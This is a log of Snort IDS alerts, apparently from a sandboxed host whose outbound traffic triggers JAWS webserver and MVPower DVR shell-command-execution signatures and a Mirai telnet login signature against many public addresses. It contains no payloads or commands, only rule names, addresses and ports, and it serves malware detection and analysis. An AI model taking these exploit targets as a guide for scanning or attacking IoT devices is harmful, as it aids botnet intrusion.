Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46230 -> 23.208.207.82:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45074 -> 160.124.26.205:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33422 -> 205.175.227.236:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54278 -> 18.206.159.108:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39792 -> 46.28.206.124:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34576 -> 104.89.17.210:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39792 -> 46.28.206.124:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42916 -> 18.184.21.21:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47762 -> 18.194.150.40:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54528 -> 107.15.250.189:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42934 -> 94.23.20.205:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35862 -> 179.60.195.130:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52806 -> 167.172.190.47:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42916 -> 18.184.21.21:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35862 -> 179.60.195.130:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52806 -> 167.172.190.47:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55750 -> 104.252.211.10:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43656 -> 154.95.153.146:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36966 -> 104.125.240.251:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33422 -> 205.175.227.236:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.208.207.82:80 -> 192.168.2.23:46230
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46230 -> 23.208.207.82:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43656 -> 154.95.153.146:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.125.240.251:80 -> 192.168.2.23:36966
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36966 -> 104.125.240.251:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51830 -> 210.48.246.67:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59700 -> 180.215.79.230:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51830 -> 210.48.246.67:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59144 -> 94.130.26.20:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48516 -> 52.85.70.101:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46134 -> 35.156.202.36:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59144 -> 94.130.26.20:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60736 -> 52.210.232.137:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49026 -> 178.170.65.117:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46134 -> 35.156.202.36:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48516 -> 52.85.70.101:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60736 -> 52.210.232.137:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35020 -> 151.101.146.114:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54668 -> 107.15.250.189:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43422 -> 104.107.104.6:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49868 -> 83.169.22.199:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57884 -> 23.5.221.89:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55486 -> 184.28.241.171:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49868 -> 83.169.22.199:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.5.221.89:80 -> 192.168.2.23:57884
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57884 -> 23.5.221.89:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44460 -> 79.185.171.228:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52952 -> 95.100.242.137:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36620 -> 34.197.9.37:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.242.137:80 -> 192.168.2.23:52952
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51186 -> 198.78.104.211:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44460 -> 79.185.171.228:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54668 -> 107.15.250.189:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.107.104.6:80 -> 192.168.2.23:43422
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43422 -> 104.107.104.6:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33692 -> 162.251.158.223:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37334 -> 23.108.233.247:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34654 -> 23.66.233.127:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53974 -> 47.56.83.196:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56838 -> 23.9.243.61:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43426 -> 188.166.98.116:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56062 -> 85.30.233.225:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38698 -> 172.104.26.93:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37598 -> 35.196.156.3:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.9.243.61:80 -> 192.168.2.23:56838
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34706 -> 23.66.233.127:80
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 211.231.7.229:23 -> 192.168.2.23:59868
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 211.231.7.229:23 -> 192.168.2.23:59868
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39566 -> 94.237.124.65:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55214 -> 199.232.199.142:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37842 -> 13.49.113.2:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43214 -> 185.37.232.211:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57678 -> 184.86.185.99:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57048 -> 75.101.185.156:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.86.185.99:80 -> 192.168.2.23:57678
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57678 -> 184.86.185.99:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39182 -> 18.194.167.246:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51476 -> 136.243.23.184:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52686 -> 46.229.200.41:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52686 -> 46.229.200.41:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48816 -> 45.32.61.41:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55044 -> 107.160.93.51:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39244 -> 23.73.100.21:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46078 -> 61.63.0.22:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48816 -> 45.32.61.41:80
Source: Traffic Snort IDS: 2023450 ET TROJAN Possible Linux.Mirai Login Attempt (xmhdipc) 192.168.2.23:34544 -> 43.252.199.80:23
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51730 -> 122.218.37.218:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.73.100.21:80 -> 192.168.2.23:39244
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39244 -> 23.73.100.21:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46078 -> 61.63.0.22:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57048 -> 75.101.185.156:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36490 -> 167.82.99.43:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55610 -> 192.206.45.102:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38546 -> 54.246.188.96:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42998 -> 46.43.80.79:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38546 -> 54.246.188.96:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57466 -> 134.122.120.121:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60762 -> 23.216.131.40:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42998 -> 46.43.80.79:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.216.131.40:80 -> 192.168.2.23:60762
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58412 -> 187.133.18.96:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48438 -> 104.215.0.165:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43214 -> 54.180.5.63:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43214 -> 54.180.5.63:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40164 -> 23.53.226.173:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41222 -> 197.246.247.65:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.53.226.173:80 -> 192.168.2.23:40164
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42050 -> 172.65.116.226:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42050 -> 172.65.116.226:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59758 -> 77.118.100.88:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41222 -> 197.246.247.65:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59758 -> 77.118.100.88:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54380 -> 51.81.28.235:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60268 -> 23.219.107.249:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48932 -> 71.16.207.248:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40482 -> 23.48.72.134:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.219.107.249:80 -> 192.168.2.23:60268
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.48.72.134:80 -> 192.168.2.23:40482
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45212 -> 201.24.30.14:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45450 -> 217.182.32.179:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34700 -> 195.18.19.136:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34700 -> 195.18.19.136:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41808 -> 73.230.21.135:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43724 -> 209.235.131.241:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54978 -> 107.15.250.189:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37660 -> 104.109.96.222:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51048 -> 65.196.116.154:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56360 -> 52.219.136.103:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41808 -> 73.230.21.135:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51692 -> 202.95.11.207:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44180 -> 104.164.97.112:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.109.96.222:80 -> 192.168.2.23:37660
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54978 -> 107.15.250.189:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43724 -> 209.235.131.241:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58092 -> 13.32.17.215:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40390 -> 156.234.240.108:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39820 -> 125.63.152.14:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39820 -> 125.63.152.14:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35132 -> 90.201.115.115:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35132 -> 90.201.115.115:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41744 -> 198.2.202.117:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51050 -> 67.186.218.75:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36864 -> 216.125.170.122:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40764 -> 223.27.39.50:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52616 -> 134.228.77.31:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52616 -> 134.228.77.31:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50796 -> 201.226.121.168:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56660 -> 47.242.77.212:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56660 -> 47.242.77.212:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36178 -> 219.68.232.164:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58204 -> 23.53.19.92:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.53.19.92:80 -> 192.168.2.23:58204
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58204 -> 23.53.19.92:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50024 -> 212.124.30.69:80
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 211.231.7.229:23 -> 192.168.2.23:60260
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 211.231.7.229:23 -> 192.168.2.23:60260
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41686 -> 35.162.37.136:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34544 -> 169.45.81.52:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53564 -> 104.79.135.61:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56332 -> 66.212.22.37:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35730 -> 174.35.126.242:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52180 -> 54.214.224.255:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56332 -> 66.212.22.37:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54200 -> 23.22.85.247:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.79.135.61:80 -> 192.168.2.23:53564
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58094 -> 155.159.183.21:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42324 -> 1.34.181.74:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52584 -> 52.56.93.214:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42324 -> 1.34.181.74:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60470 -> 144.208.70.131:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53602 -> 104.79.135.61:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33360 -> 18.130.12.121:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54602 -> 212.236.186.55:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51310 -> 95.167.220.217:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33360 -> 18.130.12.121:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55900 -> 114.124.227.100:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54602 -> 212.236.186.55:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35776 -> 149.169.31.165:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.79.135.61:80 -> 192.168.2.23:53602
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53602 -> 104.79.135.61:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 114.124.227.100:80 -> 192.168.2.23:55900
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55900 -> 114.124.227.100:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45012 -> 37.184.51.197:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45012 -> 37.184.51.197:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48796 -> 54.239.131.186:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56092 -> 92.204.43.117:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59274 -> 104.91.58.122:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41334 -> 64.87.23.140:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56918 -> 104.206.127.237:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39682 -> 23.39.254.8:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.91.58.122:80 -> 192.168.2.23:59274
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.39.254.8:80 -> 192.168.2.23:39682
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57706 -> 166.150.65.77:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54076 -> 23.201.85.40:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36006 -> 23.76.208.87:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40748 -> 104.94.164.62:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42942 -> 23.67.229.187:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43086 -> 167.172.244.142:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54276 -> 198.48.62.82:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.201.85.40:80 -> 192.168.2.23:54076
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54076 -> 23.201.85.40:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.67.229.187:80 -> 192.168.2.23:42942
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57706 -> 166.150.65.77:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43306 -> 104.99.201.149:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.76.208.87:80 -> 192.168.2.23:36006
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36006 -> 23.76.208.87:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.94.164.62:80 -> 192.168.2.23:40748
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.99.201.149:80 -> 192.168.2.23:43306
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43306 -> 104.99.201.149:80
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 211.231.7.229:23 -> 192.168.2.23:60384
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 211.231.7.229:23 -> 192.168.2.23:60384
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52614 -> 47.91.165.32:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41706 -> 104.19.142.87:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41706 -> 104.19.142.87:80
